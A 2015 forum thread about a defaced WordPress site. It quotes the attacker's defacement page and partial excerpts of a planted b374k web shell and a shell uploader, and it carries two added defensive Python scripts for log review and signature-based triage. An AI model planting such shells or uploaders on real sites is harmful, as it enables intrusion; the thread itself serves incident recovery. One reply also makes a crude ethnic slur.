
Wordpress site hacked by Bangladeshi Hacker!

Discussion in 'Black Hat SEO' started by ePrime, Oct 20, 2015.

  1. ePrime

    ePrime Jr. VIP Jr. VIP

    Joined:
    Aug 16, 2014
    Messages:
    293
    Likes Received:
    107
    My WordPress site (version 4.3.1 running Dynamic News Lite) was hacked today by some Bangladeshi hacker named Sid Gifari.
    Here is the message I got when I tried to access my site (screenshot: hack2.jpg).
    However, the WP admin panel is working just fine. I looked into the WP files and found that they have replaced everything in index.php with this:
    Code:
    <html><title>[::] Hacked By Sid Gifari [::]</title><h1><strong><em>[!!] Hacked By Sid Gifari [!!]</em></strong></h1><strong>From Bangladesh Level Seven Hacker Team</strong>[::] We Are Muslim Hacker [::]
    I can easily replace the files with the original ones, but that would be a temporary solution; if they could get into my files once, they can do it again. Does anyone have any idea about this hack?

    Thanks.
     
  2. Djuan

    Djuan Registered Member

    Joined:
    Aug 21, 2012
    Messages:
    76
    Likes Received:
    13
    Gender:
    Male
    Location:
    Sweden
    Did you use any "nulled" Theme/plugin?
     
  3. soccerlover

    soccerlover Jr. VIP Jr. VIP

    Joined:
    Jun 12, 2014
    Messages:
    3,347
    Likes Received:
    1,738
    Gender:
    Male
    Occupation:
    Seo Analyst :D
    Location:
    ♥♥♥ BHW ♥♥♥
    Home Page:
    Try checking the access log once; you'll find the IP address that made the updates.
    In the end, block them from cPanel > IP Blacklist, or block the range from .htaccess.
    You can block the entire country too :) if you don't want your site to be viewed in any particular region.
     
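The access-log check suggested above, worked through as an added example (this is not code from the post or from any of the tools named in the thread). It assumes the server writes Apache/nginx "combined" format lines; the log lines, the IP addresses (RFC 5737 documentation ranges) and the plugin path are constructed for the demo. The idea is to take the file names found during the clean-up (here b.php and up.php) and the fact that a stock WordPress install only receives POSTs on a handful of entry points, flag every request that touches an unexpected PHP script, and then pull the full request timeline of the offending IP so the requests that preceded the upload are visible.

```python
import re
from collections import Counter

# Parser for Apache "combined" / nginx default access-log lines (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# PHP entry points that legitimately receive POSTs on a stock WordPress install.
KNOWN_ENTRYPOINTS = {
    "/index.php", "/wp-login.php", "/xmlrpc.php", "/wp-cron.php",
    "/wp-admin/admin-ajax.php", "/wp-admin/admin-post.php",
    "/wp-admin/async-upload.php",
}

# Constructed sample log: documentation IPs and a made-up plugin path, not real traffic.
SAMPLE_LOG = """\
198.51.100.23 - - [20/Oct/2015:02:58:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [20/Oct/2015:02:58:11 +0000] "GET /wp-content/themes/dynamic-news-lite/style.css HTTP/1.1" 200 8802 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Oct/2015:03:14:02 +0000] "GET /wp-login.php HTTP/1.1" 200 2341 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Oct/2015:03:14:09 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [20/Oct/2015:03:19:47 +0000] "POST /wp-content/plugins/example-plugin/upload.php HTTP/1.1" 200 15 "-" "curl/7.43.0"
203.0.113.7 - - [20/Oct/2015:03:21:55 +0000] "POST /up.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Oct/2015:03:22:10 +0000] "POST /b.php HTTP/1.1" 200 9931 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Oct/2015:03:22:31 +0000] "GET /b.php HTTP/1.1" 200 9931 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_requests(log_text, unexpected_files):
    """Flag requests to files that should not exist and POSTs to non-standard PHP scripts."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]          # drop the query string
        name = path.rsplit("/", 1)[-1]
        if name in unexpected_files:
            reason = "request to a file that should not exist"
        elif rec["method"] == "POST" and path.endswith(".php") and path not in KNOWN_ENTRYPOINTS:
            reason = "POST to a non-standard PHP script"
        else:
            continue
        hits.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                     "path": path, "status": rec["status"], "reason": reason})
    return hits


def ips_to_review(hits):
    """IPs ordered by how many flagged requests they made; candidates for a block rule."""
    return Counter(h["ip"] for h in hits).most_common()


def timeline_for_ip(log_text, ip):
    """Every request from one IP, in log order, so what happened before the upload is visible."""
    out = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["ip"] == ip:
            out.append((rec["ts"], rec["method"], rec["path"], rec["status"]))
    return out


if __name__ == "__main__":
    hits = flag_requests(SAMPLE_LOG, {"b.php", "up.php"})
    for h in hits:
        print(f"{h['ts']} {h['ip']} {h['method']} {h['path']} {h['status']}  <- {h['reason']}")
    for ip, count in ips_to_review(hits):
        print(f"\n{ip}: {count} flagged request(s); full timeline:")
        for ts, method, path, status in timeline_for_ip(SAMPLE_LOG, ip):
            print(f"  {ts} {method} {path} {status}")
```

In the sample the timeline of 203.0.113.7 shows a login attempt before the first POST to up.php, which is the kind of clue that tells you whether to rotate the admin credentials or look at a plugin. Blocking the IP afterwards, as the post suggests, stops that one address but not the method used to get in.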
  4. Conor

    Conor Elite Member

    Joined:
    Nov 7, 2012
    Messages:
    3,577
    Likes Received:
    5,954
    Gender:
    Male
    Location:
    South Africa
    Home Page:
    Two plugins I recommend:

    For Scanning/Removing Malware: Anti-Malware and Brute-Force Security by ELI
    For Hardening Security: iThemes Security
     
  5. Boriss

    Boriss Supreme Member

    Joined:
    Nov 7, 2009
    Messages:
    1,440
    Likes Received:
    569
    Location:
    Inside a Monitor
    It's just a simple and ugly deface.

    To fix it:


    1. Download a fresh copy of Wordpress from the official site.
    2. First go to your WordPress with FTP or cPanel.
    3. Delete the "index.php"
    4. Then copy the "index.php" file downloaded from WordPress to your site.

    And you're done.

    Edit: Scan your sites across your server and see what's wrong.
    Always update your plugins and themes, and never use nulled scripts/themes/plugins.
     
    • Thanks Thanks x 1
    Last edited: Oct 20, 2015
  6. xpresstechnologies

    xpresstechnologies Regular Member

    Joined:
    Dec 14, 2012
    Messages:
    337
    Likes Received:
    59
    Occupation:
    Businessman
  7. ePrime

    ePrime Jr. VIP Jr. VIP

    Joined:
    Aug 16, 2014
    Messages:
    293
    Likes Received:
    107
    BTW, I successfully removed his scripts from my account.
    What I did:
    1. Opened my FileZilla and logged in to my account.
    2. Clicked on "Last Modified" to list all the directories that were modified today.
    3. Then entered all the directories that were modified today one by one and again listed the files based on last modified.
    4. All the index.php files were modified. This was NOT only a WP hack; the index.php files of all the other CMSes were modified too.
    5. During my search, I found two suspicious files: b.php and up.php.
    These files were used to upload the malicious index.php, but I'm still unsure how they uploaded these files in the first place.
    6. Removed b.php and up.php and replaced index.php with the original file, and I'm safe for a few more days!!

    b.php contents (Incomplete)
    Code:
    <?php/*
        b374k 2.8
        Jayalah Indonesiaku
        (c)2013
        http://code.google.com/p/b374k-shell
    
    
    */
    $s_pass = "fb621f5060b9f65acf8eb4232e3024140dea2b34"; // default password : b374k (login and change to new password)
    
    
    $s_ver = "2.8"; // shell ver
    $s_title = "b374k ".$s_ver; // shell title
    $s_login_time = 3600 * 24 * 7; // cookie time (login)
    $s_debug = false; // debugging mode
    
    
    @ob_start();
    @set_time_limit(0);
    @ini_set('html_errors','0');
    @clearstatcache();
    define('DS', DIRECTORY_SEPARATOR);
    
    
    // clean magic quotes
    $_POST = clean($_POST);
    $_GET = clean($_GET);
    $_COOKIE = clean($_COOKIE);
    $_GP = array_merge($_POST, $_GET);
    $_GP = array_map("ru", $_GP);
    
    
    
    
    if($s_debug){
        error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
        @ini_set('display_errors','1');
        @ini_set('log_errors','1');
        foreach($_GP as $k=>$v){
            if(is_array($v)) $v = print_r($v, true);
            echo "<span>".hss($k."=>".$v)."</span><br />";
        }
    
    }
    up.php contents (incomplete)
    Code:
    <html>
    <title>.::Sid Gifari's Uploader ::.</title>
    <style type="text/css">
    table {border-collapse: collapse;}
    td, th { border: 1px solid #000000; font-size: 75%; vertical-align: baseline;}
    </style>
    <body>
    <center>
    <font color= #e61e1e>
    <h1><strong><em>Sid Gifari's privet shell uploader</em></strong></h1>
    <br>----------------------------------------------------------------</font>
    <br>
    <br>
    <br>
    <form method="post"  enctype="multipart/form-data">
    <table width="350" border="0" cellpadding="1" cellspacing="1" class="box">
    <tr>
    
    Does anyone have any idea how they uploaded b.php and up.php in the first place?
    Thanks.
     
    Last edited: Oct 20, 2015
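The clean-up steps from the two posts above (replacing index.php with a pristine copy, then walking the tree by last-modified time and hunting for files that do not belong) can be automated into one triage pass. The script below is an added example, not code from either poster or from WordPress, and it runs against a small site tree it constructs itself in a temporary directory. It assumes a known-good table of SHA-256 hashes for the core files; on a real server that table would be computed from a fresh download of the same WordPress version, here it is computed from the constructed clean files before they are tampered with. The signature strings are taken from the files shown in this thread plus one generic obfuscation marker; the defacement text and shell header in the demo are stand-ins, not the real files.

```python
import hashlib
import os
import shutil
import tempfile
import time
from pathlib import Path

# Strings that justify a manual look at a file. The first two come from the files
# posted in this thread; the third is a generic marker for obfuscated PHP.
SIGNATURES = ("b374k", "Hacked By", "eval(base64_decode(")


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def walk_files(root):
    """Yield (relative posix path, Path) for every regular file under root."""
    root = Path(root)
    for p in sorted(root.rglob("*")):
        if p.is_file():
            yield p.relative_to(root).as_posix(), p


def triage(root, known_good, since_epoch):
    """Four independent checks; a file can be caught by any one of them."""
    report = {"recently_modified": [], "core_mismatches": [],
              "php_in_uploads": [], "signature_hits": []}
    for rel, p in walk_files(root):
        if p.stat().st_mtime >= since_epoch:               # the "Last Modified" walk
            report["recently_modified"].append(rel)
        if rel in known_good and sha256_file(p) != known_good[rel]:   # pristine-copy comparison
            report["core_mismatches"].append(rel)
        if rel.startswith("wp-content/uploads/") and rel.lower().endswith((".php", ".phtml", ".php5")):
            report["php_in_uploads"].append(rel)           # uploads should hold media, never PHP
        if rel.endswith((".php", ".html")):
            text = p.read_text(errors="replace")
            if any(sig in text for sig in SIGNATURES):
                report["signature_hits"].append(rel)
    return report


def build_demo_site():
    """Constructed site tree: three clean files aged 30 days, then three planted ones."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    clean = {
        "index.php": "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n",
        "wp-blog-header.php": "<?php\nrequire __DIR__ . '/wp-load.php';\n",
        "wp-content/themes/dynamic-news-lite/style.css": "/* theme stylesheet (constructed) */\n",
    }
    known_good = {}
    old = time.time() - 30 * 86400
    for rel, body in clean.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
        os.utime(p, (old, old))
        known_good[rel] = sha256_file(p)        # stands in for hashes of a fresh download
    since = time.time() - 3600                   # "modified in the last hour"
    tampered = {
        "index.php": "<html><title>[::] Hacked By EXAMPLE-DEFACER [::]</title></html>",
        "b.php": "<?php /* b374k 2.8 (header only, constructed stand-in) */\n",
        "wp-content/uploads/2015/10/up.php": '<html><title>uploader</title><form method="post" enctype="multipart/form-data"></form></html>',
    }
    for rel, body in tampered.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return str(root), known_good, since


if __name__ == "__main__":
    root, known_good, since = build_demo_site()
    try:
        for check, files in triage(root, known_good, since).items():
            print(f"{check}: {files}")
    finally:
        shutil.rmtree(root)
```

Note that up.php in the demo is caught only by the uploads check: it contains none of the signature strings, which is why a hash comparison of core files or a string scan on its own is not enough, and why the mtime walk the poster did is worth keeping as a separate check even though an attacker can reset timestamps.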
  8. zlogz

    zlogz Regular Member

    Joined:
    Jan 22, 2011
    Messages:
    403
    Likes Received:
    43
    Location:
    -
    Are you using shared hosting? Then you should check for a local attack (1) => remote upload

    Or
    using nulled plugins/themes is an easy hack too (2)

    Or a 0-day exploit; there's nothing you can do about it until they (the developer) fix it (3)
     
    Last edited: Oct 20, 2015
  9. ePrime

    ePrime Jr. VIP Jr. VIP

    Joined:
    Aug 16, 2014
    Messages:
    293
    Likes Received:
    107
    No, I'm not using nulled scripts.
    Thanks, I'll check out local attack (1) => remote upload
     
  10. Ambitious12

    Ambitious12 Elite Member

    Joined:
    Jun 26, 2014
    Messages:
    3,096
    Likes Received:
    609
    Occupation:
    No Occupation
    Location:
    Among the Stars
    You can ask your hosting provider for security.
     
  11. Asif WILSON Khan

    Asif WILSON Khan Executive VIP Jr. VIP

    Joined:
    Nov 10, 2012
    Messages:
    12,156
    Likes Received:
    33,709
    Gender:
    Male
    Occupation:
    Fun Lovin' Criminal
    Location:
    London
    Home Page:
  12. auraita

    auraita Regular Member

    Joined:
    Dec 30, 2013
    Messages:
    283
    Likes Received:
    280
    He is not a hacker; he only does copy, paste, release and search. The sites "hacked" by him are WordPress. He probably has no idea how to hack a site without ready-made code.
     
    • Thanks Thanks x 1
  13. kunnu

    kunnu Regular Member

    Joined:
    Jun 28, 2015
    Messages:
    217
    Likes Received:
    34
    Home Page:
    Maybe your PC is infected and you are using plain FTP. You should always use SFTP (Secure FTP).

    Most WP sites get hacked because they use old or outdated plugins/themes or use themes from anywhere.

    Change everything: FTP password, email password, control panel, MySQL password. Remove all files/folders from your site, reinstall WordPress and keep using the old MySQL database.
     
  14. ki jancuk

    ki jancuk Newbie

    Joined:
    Oct 11, 2015
    Messages:
    1
    Likes Received:
    0
    There is the word "Indonesia" in there.

    Indonesian hackers are the most motherfuck*er hackers in the world
     
  15. RuthSam

    RuthSam Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 19, 2010
    Messages:
    3,813
    Likes Received:
    976
    Gender:
    Male
    Home Page:
    The scanners listed in this thread are good, I use one or 2 of them regularly on my sites. Thanks for sharing your info to recover the WP installation.
     
  16. fpiket18

    fpiket18 Newbie

    Joined:
    Feb 27, 2015
    Messages:
    14
    Likes Received:
    0
    Damn hacker! Why does he even do this?
     
  17. ScarfaceMontana

    ScarfaceMontana Registered Member

    Joined:
    Mar 2, 2015
    Messages:
    84
    Likes Received:
    26
    These two PHP files are shells. They somehow got access to your WP panel and uploaded them as an image file or so, but then renamed them. Anyway, the best thing you can do is to install a new WP installation and then use your backups to restore everything.
     
  18. ScarfaceMontana

    ScarfaceMontana Registered Member

    Joined:
    Mar 2, 2015
    Messages:
    84
    Likes Received:
    26
    Several reasons. Probably to test his skills. Or he was going to do damage to this dude's business because, probably, he is a competitor.
     
  19. Berkeli

    Berkeli Regular Member

    Joined:
    Oct 16, 2012
    Messages:
    352
    Likes Received:
    216
    Occupation:
    SEO
    Location:
    Above & Beyond
    Home Page:
    I can only assume your PC is infected.
    It isn't easy to upload PHP files to a WordPress site, only through FTP or the admin panel. Just change your passwords and use SFTP as mentioned above.
     
  20. Conor

    Conor Elite Member

    Joined:
    Nov 7, 2012
    Messages:
    3,577
    Likes Received:
    5,954
    Gender:
    Male
    Location:
    South Africa
    Home Page:
    I doubt that. A competitor wouldn't just deface a website if they really wanted to get rid of their competition. This is more likely a kid who found some "hacking" codes on the internet and is trying to impress his friends.